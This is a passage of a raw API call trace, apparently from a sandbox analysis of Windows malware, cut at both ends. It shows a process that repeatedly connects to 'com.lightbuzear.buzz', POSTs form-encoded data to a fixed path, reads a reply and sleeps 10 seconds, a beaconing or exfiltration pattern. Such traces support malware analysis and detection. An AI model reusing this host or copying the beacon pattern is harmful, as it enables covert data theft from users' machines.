| out: hHeap=0x4780000) returned 1 [0281.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0281.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed70 | out: hHeap=0x4780000) returned 1 [0281.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee10 [0281.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0281.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed70 [0281.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0281.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0281.444] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0281.444] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0281.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed70 | out: hHeap=0x4780000) returned 1 [0281.444] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0281.444] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0281.445] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0281.445] FreeLibrary (hLibModule=0x71570000) returned 1 [0281.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0281.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0281.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf1d0 | out: hHeap=0x4780000) returned 1 [0281.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beff0 | out: hHeap=0x4780000) returned 1 [0281.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0281.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0281.446] Sleep (dwMilliseconds=0x2710) [0281.448] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0281.448] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0281.448] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0281.448] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0281.448] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0281.448] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0281.449] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0281.449] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0281.449] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0281.449] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f1e8 [0281.449] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0281.449] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f200 [0281.449] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1e8 | out: hHeap=0x4780000) returned 1 [0281.449] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0281.449] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0281.449] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f080 [0281.449] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0281.450] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0281.450] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0281.450] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0281.450] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0281.450] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0281.450] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0281.451] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0281.451] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0281.451] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0281.451] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0281.451] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0281.451] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0281.451] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0281.451] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f098 [0281.451] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0281.451] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f188 [0281.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f098 | out: hHeap=0x4780000) returned 1 [0281.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0281.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f188 | out: hHeap=0x4780000) returned 1 [0281.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be8e8 [0281.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0281.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0281.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0281.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0281.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0281.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0281.453] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0281.453] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0281.453] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0281.453] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0281.453] FreeLibrary (hLibModule=0x71780000) returned 1 [0281.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0281.454] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0281.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beed8 [0281.454] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0281.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0281.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0281.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0281.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0281.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0281.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0281.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0281.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0281.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0281.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f188 [0281.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0281.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1e8 [0281.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f188 | out: hHeap=0x4780000) returned 1 [0281.455] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0281.455] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1e8 | out: hHeap=0x4780000) returned 1 [0281.455] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f1e8 [0281.455] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf158 [0281.455] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf158 | out: hHeap=0x4780000) returned 1 [0281.455] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0281.455] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf0e0 [0281.455] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0281.455] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf108 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0281.456] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0281.456] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0281.456] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0281.456] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f170 [0281.456] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f110 [0281.456] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f170 | out: hHeap=0x4780000) returned 1 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0281.456] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f110 | out: hHeap=0x4780000) returned 1 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f098 [0281.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef78 [0281.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef78 | out: hHeap=0x4780000) returned 1 [0281.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0281.457] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0281.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0281.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0281.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0281.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0281.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0281.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0281.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0281.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0c8 [0281.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0e0 [0281.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0281.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bed70 [0281.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0281.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed70 | out: hHeap=0x4780000) returned 1 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed20 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0281.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0281.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0281.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0281.459] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0281.459] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0281.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0281.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0c8 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f188 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f188 | out: hHeap=0x4780000) returned 1 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bee38 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0281.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0281.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0281.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef78 [0281.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0281.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0281.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0281.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0281.461] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0281.462] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0282.546] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0282.546] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0282.546] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0282.547] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0282.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0282.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0282.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0282.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0282.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0282.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0282.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0282.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0282.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0282.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0c8 [0282.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0282.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f218 [0282.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0282.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0282.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f218 | out: hHeap=0x4780000) returned 1 [0282.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf180 [0282.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0282.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0282.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf180 | out: hHeap=0x4780000) returned 1 [0282.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf130 [0282.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0282.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed70 [0282.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0282.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0282.549] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0282.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0282.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed70 | out: hHeap=0x4780000) returned 1 [0282.550] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0282.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0282.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0282.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0282.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0282.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0282.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0282.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0282.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0282.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0282.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f218 [0282.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0282.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1a0 [0282.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f218 | out: hHeap=0x4780000) returned 1 [0282.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0282.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0282.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bef00 [0282.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0282.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0282.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0282.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed98 [0282.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0282.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0282.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0282.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0282.553] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0282.553] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0282.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0282.554] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0282.554] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0282.554] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0282.554] FreeLibrary (hLibModule=0x71570000) returned 1 [0282.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0282.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0282.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf108 | out: hHeap=0x4780000) returned 1 [0282.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf0e0 | out: hHeap=0x4780000) returned 1 [0282.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beed8 | out: hHeap=0x4780000) returned 1 [0282.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0282.557] Sleep (dwMilliseconds=0x2710) [0282.573] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0282.573] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0282.573] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0282.573] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0282.573] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 